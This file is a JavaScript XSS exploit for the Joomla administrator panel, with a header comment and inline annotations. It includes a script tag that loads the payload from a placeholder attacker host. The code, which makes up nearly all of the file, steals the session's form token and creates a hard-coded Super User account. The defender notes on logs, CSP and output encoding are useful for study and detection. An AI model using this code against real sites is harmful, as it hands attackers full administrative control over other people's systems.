Joomla admin panel admin ekleme XSS scripti
/*
 * Author: Gökmen Güreşçi & Muhammet Dilmaç
 * Attack payload (the tag that loads this file from an attacker-controlled host):
 * <script>var script = document.createElement('script');script.src = "http://ATTACK_IP/attack.js";document.getElementsByTagName('head')[0].appendChild(script);</script>
 *
 * What this script does once it executes inside a logged-in Joomla administrator's
 * browser (i.e. after an XSS flaw in the admin panel has loaded it): it fetches the
 * user-edit form with the victim's own session, extracts the form token from the
 * returned HTML, and then submits that form to create a new account in group 8
 * (the Super Users group on a default Joomla install) with the hard-coded
 * name, username, password and e-mail below.
 *
 * Defender notes:
 *  - The anti-CSRF token is read from a same-origin response, so CSRF tokens do
 *    not protect against requests issued by injected script. The real fix is
 *    removing the XSS (output encoding of admin-panel input) plus a restrictive
 *    Content-Security-Policy script-src that does not allow arbitrary external hosts.
 *  - Observable artefacts in server logs: a GET of
 *    index.php?option=com_users&view=user&layout=edit immediately followed by a
 *    POST with task=user.apply from the same session, and a new user appearing in
 *    the super-user group that no administrator created. Alerting on membership
 *    changes in administrator groups catches this regardless of the payload's
 *    specific strings.
 */
// Two requests: `request` fetches the edit form (to harvest the token),
// `req` submits the forged form.
var request = new XMLHttpRequest();
var req = new XMLHttpRequest();
// Name of the hidden form-token field, filled in from the GET response.
var id = '';
// Random multipart boundary; the body uses `space + boundary`, i.e. two more
// dashes than the boundary declared in the Content-Type header, as multipart requires.
var boundary = Math.random().toString().substr(2);
var space = "-----------------------------";
// Same-origin XHR: the browser attaches the administrator's session cookies.
request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true);
request.onload = function() {
if (request.status >= 200 && request.status < 400) {
var resp = request.responseText;
// Joomla renders its form token as a hidden input whose name is the per-session
// token and whose value is "1"; only the field name is needed for the POST.
// NOTE: exec() returns null when the form (or token) is absent, so the next
// line throws in that case — the script simply dies instead of posting.
var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/;
id = myRegex.exec(resp)[1];
// id=0 means "create a new user" rather than edit an existing one.
req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true);
req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary);
// Hand-built multipart body mirroring the fields of the admin user-edit form.
// All values are hard-coded; these strings are useful indicators when reviewing
// the users table or request logs.
var multipart = space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[name]\"" +
"\r\n\r\nADEO Security\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[username]\"" +
"\r\n\r\nadeosec\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[password]\"" +
"\r\n\r\n4d30s3cur1ty\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[password2]\"" +
"\r\n\r\n4d30s3cur1ty\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[email]\"" +
"\r\n\r\nspam@adeo.com.tr\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" +
"\r\n\r\n\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" +
"\r\n\r\n\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" +
"\r\n\r\n\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" +
"\r\n\r\n0\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" +
"\r\n\r\n0\r\n" +
space + boundary +
// block=0 / requireReset=0: the account is enabled and usable immediately.
"\r\nContent-Disposition: form-data; name=\"jform[block]\"" +
"\r\n\r\n0\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" +
"\r\n\r\n0\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[id]\"" +
"\r\n\r\n0\r\n" +
space + boundary +
// Group 8 is the Super Users group on a default install — this is the
// privilege escalation step; monitor additions to this group.
"\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" +
"\r\n\r\n8\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" +
"\r\n\r\n\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" +
"\r\n\r\n\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" +
"\r\n\r\n\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" +
"\r\n\r\n\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" +
"\r\n\r\n\r\n" +
space + boundary +
"\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" +
"\r\n\r\n\r\n" +
space + boundary +
// task=user.apply saves the record; this parameter is a good log-search key.
"\r\nContent-Disposition: form-data; name=\"task\"" +
"\r\n\r\nuser.apply\r\n" +
space + boundary +
// The harvested token field (name = token, value = 1) makes the POST pass
// Joomla's CSRF check.
"\r\nContent-Disposition: form-data; name=\"" + id + "\"" +
"\r\n\r\n1\r\n" +
space + boundary + "--\r\n";
req.onload = function() {
if (req.status >= 200 && req.status < 400) {
var resp = req.responseText;
// The server's response is only echoed to the browser console; no further action.
console.log(resp);
}
};
req.send(multipart);
}
};
request.send();